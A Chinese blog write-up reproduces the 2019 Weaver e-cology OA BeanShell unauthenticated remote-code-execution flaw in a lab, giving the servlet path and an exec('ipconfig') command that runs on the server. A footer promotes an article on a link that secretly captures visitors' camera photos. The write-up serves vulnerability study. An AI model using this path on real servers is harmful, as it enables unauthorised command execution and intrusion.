泛微e-cology OA 系统远程代码执行漏洞

  • Comments Off on 泛微e-cology OA 系统远程代码执行漏洞
  • 12 views
  • A+
所属分类:安全文章

声明

好好学习,天天向上

漏洞描述

2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛微e-cology OA系统的用户尽快采取防护措施。

泛微e-cology OA系统存在java Beanshell接口,攻击者调用该Beanshell可以被未授权访问接口,构造特定的数据请求绕过OA自带的一些安全限制进行远程命令执行。

影响范围

  • 泛微e-cology <= 9.0

复现过程

这里使用8.1版本

下载地址

链接:https://pan.baidu.com/s/1pgGSiUHV5ui3DGA0qt_Xyw 提取码:832d
  • 1

搭建过程(总结一个字就是慢慢慢,每一步都很慢,但是为了了解漏洞,搭建5小时,复现2分钟)

1.安装windows2012的镜像

2.搭建SQL server

3.搭建泛微OA

参考大佬复现过程(这两个链接已经写得很清楚了,麻烦细看)

https://www.pianshen.com/article/9742766831/
https://msdn.itellyou.cn/
  • 1
  • 2

需要windows-server2012的镜像,下载地址

ed2k://|file|cn_windows_server_2012_x64_dvd_915588.iso|3826081792|6A56281311F9FE6973F66CF36E2F50BE|/
  • 1

SQL Server下载地址

ed2k://|file|cn_sql_server_2012_standard_edition_x86_x64_dvd_813404.iso|5054384128|4BA89C95A1A99FE3B6D0D152947FFC7E|/
  • 1

windows-server2012搞定,我设的6G内存,安装完后,换了好久,卡的要死

泛微e-cology OA 系统远程代码执行漏洞

SQL Server,把iso拷贝到2012上,双击iso,然后跟着教程一步一步来,我这报错了,又按照教程安装了一遍,各位可以先处理掉哪个报错,再安装

泛微e-cology OA 系统远程代码执行漏洞

泛微还要进行一些数据库初始化

泛微e-cology OA 系统远程代码执行漏洞

终于完事,关闭了防火墙,就可以远程开搞啦

访问

http://192.168.239.194/weaver/bsh.servlet.BshServlet/
  • 1

输入后直接在 Script 处输入Java代码点击 Evaluate 即可触发漏洞,并可以在Script Output处看到回显

exec("ipconfig");
  • 1

相关推荐: 一条链接获取你的照片【附源码】

测试链接   https://sunpma.com/other/xiangjiquanxian无论是手机还是pc,都会被获取。请谨慎点击,直接申请获取相机权限,拍照上传到服务器。现在众多手机APP乱用权限并窃取用户隐私,大家要注意保护好自己…